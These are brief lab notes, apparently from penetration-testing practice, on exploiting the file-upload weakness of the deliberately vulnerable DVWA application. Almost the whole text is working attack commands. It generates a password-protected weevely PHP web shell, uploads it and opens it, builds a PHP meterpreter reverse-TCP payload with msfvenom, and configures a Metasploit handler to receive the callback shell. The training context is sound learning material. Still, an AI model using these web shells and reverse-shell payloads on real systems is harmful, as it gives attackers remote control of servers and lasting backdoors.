


## Generates a payload
## 12345 is password
-> **weevely generate** 12345 lowweevely.php
-> ls
## go the browse (to upload the file)
**→ [<http://ip/dvwa/hackable/uploads/lowweevly.php>](<http://ip/dvwa/hackable/uploads/lowweevly.php>) 12345**
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=2222 -f raw > lowshell.php

msfconsole -q
-> use exploit/multi/handler
-> set payload php/meterpreter/reverse_tcp
-> set lhost
-> set lport
-> exploit


→ Copy pasting at the URL

Press enter after pasting the link
